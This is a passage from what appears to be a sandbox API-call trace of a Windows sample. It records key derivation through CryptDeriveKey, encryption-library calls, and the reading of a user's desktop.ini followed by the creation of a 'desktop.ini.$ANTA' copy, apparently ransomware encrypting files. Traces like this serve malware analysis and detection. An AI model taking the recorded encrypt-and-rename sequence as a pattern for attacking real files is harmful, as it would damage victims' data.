cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0096.130] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac640) returned 1 [0096.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0096.130] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0096.130] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0096.130] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.131] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0096.131] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0096.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0096.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4838 [0096.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0096.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0096.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0096.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0096.157] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures")) returned 0x11 [0096.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0096.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0096.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0096.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0096.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0096.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0096.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0096.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0096.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\desktop.ini.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0096.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0096.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0096.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0096.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0096.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.159] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0096.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0096.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0096.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0096.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0096.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0096.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0096.160] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0096.160] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0096.160] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0096.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0096.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0096.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0096.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0096.164] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0096.164] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xbe, lpOverlapped=0x0) returned 1 [0096.166] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0096.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0096.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x1b218f0 [0096.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0096.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0096.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0096.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x43ebe00 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0096.170] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0096.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0096.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0096.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x43ec1e8 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ec1e8 | out: hHeap=0x1780000) returned 1 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.170] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0096.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0096.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0096.171] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0096.171] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0096.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0096.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x43ec508 [0096.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0096.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0096.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x43ec5d0 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0096.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0096.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0096.173] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0096.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0096.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0096.173] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0096.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0096.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0096.173] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0096.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0096.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0096.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0096.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0096.174] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0096.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0096.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0096.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 